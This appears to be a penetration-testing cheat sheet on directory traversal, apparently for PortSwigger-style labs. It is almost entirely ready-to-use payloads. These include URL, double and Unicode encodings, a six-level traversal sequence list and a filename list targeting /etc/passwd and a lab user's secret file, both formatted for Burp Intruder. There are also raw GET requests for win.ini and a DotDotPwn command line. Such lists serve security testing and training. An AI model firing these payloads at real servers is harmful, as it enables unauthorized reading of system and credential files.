A directory traversal vulnerability can be present inside a web server, inside an application framework (during the HTTP request pre-processing and routing), or within an application endpoint that processes data according to application logic (for example, reading a file from storage based on its name).
Platform - Filename and Path
You need to figure out a platform in order to know how to address specific files. For Linux, a good file to read is/etc/passwwhich is readable every time. On Windows, you can choose C:\Windows\win.ini
Simple
URL encoding
Copy . = %2e
/ = %2f
\ = %5c Double URL encoding
Copy . = %252e
/ = %252f
\ = %255c UTF-8 bit Unicode
Copy . = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c 16 bit Unicode
Copy . = %u002e
/ = %u2215
\ = %u2216 Bypass Path Sequence
Copy ../
.../
..../
..\
..\/
..;/
..././
...\.\
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216 Intruder
Don't forget to disable URL encoding for the both next Payloads (payload1,payload2)
Payload 1 - Traversal directory sequence, deep 6
Copy ../
../../
../../../
../../../../
../../../../../
../../../../../../
.../
.../.../
.../.../.../
.../.../.../.../
.../.../.../.../.../
.../.../.../.../.../.../
...//
...//...//
...//...//...//
...//...//...//...//
...//...//...//...//...//
...//...//...//...//...//...//
....//....//
....//....//....//
....//....//....//....//
....//....//....//....//....//
....//....//....//....//....//....//
..\
..\..\
..\..\..\
..\..\..\..\
..\..\..\..\..\
..\..\..\..\..\..\
...\
...\...\
...\...\...\
...\...\...\...\
...\...\...\...\...\
...\...\...\...\...\...\
....\\....\\
....\\....\\....\\
....\\....\\....\\....\\
....\\....\\....\\....\\....\\
....\\....\\....\\....\\....\\....\\
....\/
....\/....\/
....\/....\/....\/
....\/....\/....\/....\/
....\/....\/....\/....\/....\/
....\/....\/....\/....\/....\/....\/
..\/
..\/..\/
..\/..\/..\/
..\/..\/..\/..\/
..\/..\/..\/..\/..\/
..\/..\/..\/..\/..\/..\/
..;/
..;/..;/
..;/..;/..;/
..;/..;/..;/..;/
..;/..;/..;/..;/..;/
..;/..;/..;/..;/..;/..;/
..././
..././..././
..././..././..././
..././..././..././..././
..././..././..././..././..././
..././..././..././..././..././..././
...\.\
...\.\...\.\
...\.\...\.\...\.\
...\.\...\.\...\.\...\.\
...\.\...\.\...\.\...\.\...\.\
...\.\...\.\...\.\...\.\...\.\...\.\
%2e%2e%2f
%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%252e%252e%252f
%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
..%c0%af
..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216 Payload 2 - Filename
Copy etc/passwd
etc/passwd%00
etc/passwd%00.jpg
etc/passwd%00.png
etc//passwd
etc\passwd
etc\\passwd
etc%2fpasswd
etc%252fpasswd
etc%c0%afpasswd
etc%c0%af%e0%80%afpasswd
etc%c0%2fpasswd
etc%c0%5cpasswd
etc%c0%80%5cpasswd
etc%u2215passwd
etc%u2216passwd
home/carlos/secret
home/carlos/secret%00
home/carlos/secret%00.jpg
home/carlos/secret%00.png
home//carlos//secret
home\carlos\secret
home\\carlos\\secret
home%2fcarlos%2fsecret
home%252fcarlos%252fsecret
home%c0%afcarlos%c0%afsecret
home%c0%af%e0%80%afcarlos%c0%af%e0%80%afsecret
home%c0%2fcarlos%c0%2fsecret
home%c0%5ccarlos%c0%5csecret
home%c0%80%5ccarlos%c0%80%5csecret
home%u2215carlos%u2215secret
home%u2216carlos%u2216secret Web Server Path Traversal Attacks
Copy GET C:/Windows/win.ini
GET /C:/Windows/win.ini
GET file:///Windows/win.ini
GET /~/Windows/win.ini
Tools
DotDotPwn
Copy dotdotpwn -m http-url -u https://example.com/TRAVERSAL -f /etc/passwd -k root
References
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal
https://gracefulsecurity.com/path-traversal-cheat-sheet-linux/
https://www.kali.org/tools/dotdotpwn/
